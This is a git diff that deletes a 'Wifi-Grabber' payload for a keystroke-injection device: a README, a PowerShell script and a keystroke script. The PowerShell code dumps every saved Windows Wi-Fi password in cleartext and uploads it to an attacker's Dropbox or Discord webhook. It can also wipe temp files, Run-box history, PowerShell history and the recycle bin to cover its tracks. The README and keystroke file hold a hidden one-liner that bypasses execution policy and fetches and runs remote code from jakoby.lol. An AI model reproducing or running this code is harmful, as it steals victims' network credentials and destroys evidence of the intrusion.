diff --git a/Payloads/Flip-WifiGrabber/README.md b/Payloads/Flip-WifiGrabber/README.md
deleted file mode 100644
index 0394189..0000000
--- a/Payloads/Flip-WifiGrabber/README.md
+++ /dev/null
@@ -1,111 +0,0 @@
-
-
-
-
- Table of Contents
-
- - Description
- - Getting Started
- - Contributing
- - Version History
- - Contact
- - Acknowledgments
-
-
-
-# Wifi-Grabber
-
-## Description
-
-This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both.
-
-## Getting Started
-
-### Dependencies
-
-* Windows 10,11
-
-### Executing program
-
-* Plug in your device
-* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
-
-`$dc` is the variable that stores your Discord webhook
-
-`$db` is the variable that stores your Dropbox token
-
-Fill in either or both of these to methods to exfil your collected data
-
-```
-powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/e8v | iex
-```
-
-
(back to top)
-
-## Contributing
-
-All contributors names will be listed here
-
-I am Jakoby
-
-(back to top)
-
-## Version History
-
-* 0.1
- * Initial Release
-
-(back to top)
-
-
-## Contact
-
-📱 My Socials 📱
-
-
-
-
-(back to top)
-
-
-## Acknowledgments
-
-* [Hak5](https://hak5.org/)
-* [MG](https://github.com/OMG-MG)
-
-(back to top)
diff --git a/Payloads/Flip-WifiGrabber/WifiGrabber.ps1 b/Payloads/Flip-WifiGrabber/WifiGrabber.ps1
deleted file mode 100644
index 3dfec32..0000000
--- a/Payloads/Flip-WifiGrabber/WifiGrabber.ps1
+++ /dev/null
@@ -1,86 +0,0 @@
-############################################################################################################################################################
-
-$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String
-
-
-$wifiProfiles > $env:TEMP/--wifi-pass.txt
-
-############################################################################################################################################################
-
-# Upload output file to Dropbox
-
-function DropBox-Upload {
-
-[CmdletBinding()]
-param (
-
-[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
-[Alias("f")]
-[string]$SourceFilePath
-)
-$outputFile = Split-Path $SourceFilePath -leaf
-$TargetFilePath="/$outputFile"
-$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
-$authorization = "Bearer " + $db
-$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
-$headers.Add("Authorization", $authorization)
-$headers.Add("Dropbox-API-Arg", $arg)
-$headers.Add("Content-Type", 'application/octet-stream')
-Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
-}
-
-if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TEMP/--wifi-pass.txt}
-
-############################################################################################################################################################
-
-function Upload-Discord {
-
-[CmdletBinding()]
-param (
- [parameter(Position=0,Mandatory=$False)]
- [string]$file,
- [parameter(Position=1,Mandatory=$False)]
- [string]$text
-)
-
-$hookurl = "$dc"
-
-$Body = @{
- 'username' = $env:username
- 'content' = $text
-}
-
-if (-not ([string]::IsNullOrEmpty($text))){
-Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
-
-if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
-}
-
-if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:TEMP/--wifi-pass.txt"}
-
-
-
-############################################################################################################################################################
-
-function Clean-Exfil {
-
-# empty temp folder
-rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
-
-# delete run box history
-reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
-
-# Delete powershell history
-Remove-Item (Get-PSreadlineOption).HistorySavePath -ErrorAction SilentlyContinue
-
-# Empty recycle bin
-Clear-RecycleBin -Force -ErrorAction SilentlyContinue
-
-}
-
-############################################################################################################################################################
-
-if (-not ([string]::IsNullOrEmpty($ce))){Clean-Exfil}
-
-
-RI $env:TEMP/--wifi-pass.txt
diff --git a/Payloads/Flip-WifiGrabber/WifiGrabber.txt b/Payloads/Flip-WifiGrabber/WifiGrabber.txt
deleted file mode 100644
index 77388c8..0000000
--- a/Payloads/Flip-WifiGrabber/WifiGrabber.txt
+++ /dev/null
@@ -1,12 +0,0 @@
-REM Title: Wifi Grabber
-
-REM Author: I am Jakoby
-
-REM Description: This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both.
-
-REM Target: Windows 10, 11
-
-GUI r
-DELAY 500
-STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/e8v | iex
-ENTER